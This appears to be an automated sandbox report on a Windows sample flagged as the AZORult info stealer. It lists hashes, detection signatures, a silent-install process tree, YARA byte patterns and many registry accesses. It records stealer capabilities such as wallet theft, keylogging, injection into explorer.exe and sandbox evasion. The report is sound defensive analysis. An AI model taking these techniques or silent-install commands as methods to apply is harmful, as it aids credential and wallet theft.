Play interactive tour

Edit tour

Windows Analysis Report 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe

Overview

General Information

Sample Name:	0331C7BCA665F36513377FC301CBB32822FF35F925115.exe
Analysis ID:	527579
MD5:	56db11a012b50b84e5c527f3d9d9cd89
SHA1:	d10607746d8d0a25b1f4c5de6e4117ccd8d43897
SHA256:	0331c7bca665f36513377fc301cbb32822ff35f92511579d699613f0bb624802
Tags:	AZORultexe
Infos:
Most interesting Screenshot:

Detection

AZORult

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Azorult Info Stealer

Detected unpacking (changes PE section rights)

Antivirus detection for dropped file

Yara detected Azorult

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Detected AZORult Info Stealer

Antivirus / Scanner detection for submitted sample

Creates multiple autostart registry keys

Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)

Binary is likely a compiled AutoIt script file

Found many strings related to Crypto-Wallets (likely being stolen)

Injects code into the Windows Explorer (explorer.exe)

Obfuscated command line found

Machine Learning detection for dropped file

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Stores files to the Windows start menu directory

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Queries keyboard layouts

PE file contains more sections than normal

Contains functionality to retrieve information about pressed keystrokes

Creates a process in suspended mode (likely to inject code)

Sigma detected: PowerShell Script Run in AppData

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to shutdown / reboot the system

Creates COM task schedule object (often to register a task for autostart)

PE file contains sections with non-standard names

Found potential string decryption / allocating functions

Contains functionality to communicate with device drivers

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

PE file contains executable resources (Code or Archives)

AV process strings found (often used to terminate AV products)

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Installs a global mouse hook

Contains functionality to launch a program with higher privileges

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Contains functionality to detect sandboxes (mouse cursor move detection)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

0331C7BCA665F36513377FC301CBB32822FF35F925115.exe (PID: 4668 cmdline: "C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe" MD5: 56DB11A012B50B84E5C527F3D9D9CD89)

cexplorer.exe (PID: 6748 cmdline: "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP- MD5: B2E5A8FE3CA4F0CD681B5662F972EA5F)

cexplorer.tmp (PID: 6744 cmdline: "C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp" /SL5="$C025E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP- MD5: 729BC0108BCD7EC083DFA83D7A4577F2)

ChameleonExplorer.exe (PID: 7060 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister MD5: 92A3D0847FC622B31F2D0C273A676C0E)

ChameleonExplorer.exe (PID: 6856 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer MD5: 92A3D0847FC622B31F2D0C273A676C0E)

ChameleonFolder.exe (PID: 3372 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)

ChameleonExplorer.exe (PID: 760 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update MD5: 92A3D0847FC622B31F2D0C273A676C0E)

update.exe (PID: 5720 cmdline: "C:\Users\user\AppData\Roaming\update.exe" MD5: 1286DF675C3878D0FC4A89FCCD98CE86)

ChameleonFolder.exe (PID: 3212 cmdline: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)

ChameleonFolder64.exe (PID: 7068 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 590118 MD5: 246AAA95ABDDFD76F9166A2DAA9F2D73)

ChameleonExplorer.exe (PID: 6428 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup MD5: 92A3D0847FC622B31F2D0C273A676C0E)

ChameleonFolder.exe (PID: 7116 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)

ChameleonFolder.exe (PID: 6228 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)

ChameleonFolder.exe (PID: 6404 cmdline: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)

ChameleonFolder.exe (PID: 5976 cmdline: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)

ChameleonExplorer.exe (PID: 5380 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup MD5: 92A3D0847FC622B31F2D0C273A676C0E)

ChameleonFolder.exe (PID: 5756 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)

ChameleonFolder.exe (PID: 5012 cmdline: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Program Files (x86)\Chameleon Explorer\is-NOOMK.tmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000008.00000003.308603193.0000000000460000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000008.00000003.308603193.0000000000460000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000008.00000003.308603193.0000000000460000.00000004.00000001.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000007.00000003.389900078.00000000051B2000.00000004.00000001.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.update.exe.400000.0.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
8.2.update.exe.400000.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
8.2.update.exe.400000.0.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
8.2.update.exe.400000.0.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
8.2.update.exe.400000.0.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
8.2.update.exe.400000.0.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
8.3.update.exe.460000.0.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
8.3.update.exe.460000.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
8.3.update.exe.460000.0.unpack	Azorult_1	Azorult Payload	kevoreilly	0x16753:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1147c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
8.3.update.exe.460000.0.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
8.3.update.exe.460000.0.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
8.3.update.exe.460000.0.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
Click to see the 7 entries

Sigma Overview

System Summary:

Sigma detected: PowerShell Script Run in AppData

Show sources

Source: Process started

Author: Florian Roth, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp" /SL5="$C025E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-, CommandLine: "C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp" /SL5="$C025E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-, CommandLine|base64offset|contains: Qa", Image: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp, NewProcessName: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp, OriginalFileName: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp, ParentCommandLine: "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-, ParentImage: C:\Users\user\AppData\Roaming\cexplorer.exe, ParentProcessId: 6748, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp" /SL5="$C025E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-, ProcessId: 6744

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\update.exe

Avira: detection malicious, Label: HEUR/AGEN.1102745

Multi AV Scanner detection for submitted file

Show sources

Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Virustotal: Detection: 72%	Perma Link
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Metadefender: Detection: 34%	Perma Link
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	ReversingLabs: Detection: 67%

Antivirus / Scanner detection for submitted sample

Show sources

Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe

Avira: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\update.exe

Joe Sandbox ML: detected

Source: 1.3.0331C7BCA665F36513377FC301CBB32822FF35F925115.exe.4937bf8.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.0331C7BCA665F36513377FC301CBB32822FF35F925115.exe.b3b7fc.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: C:\Users\user\AppData\Roaming\update.exe

Code function: 8_2_0040A610 CryptUnprotectData,LocalFree,

8_2_0040A610

Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source: C:\Users\user\AppData\Roaming\update.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 5.9.164.117:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.52:443 -> 192.168.2.3:49747 version: TLS 1.2

Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
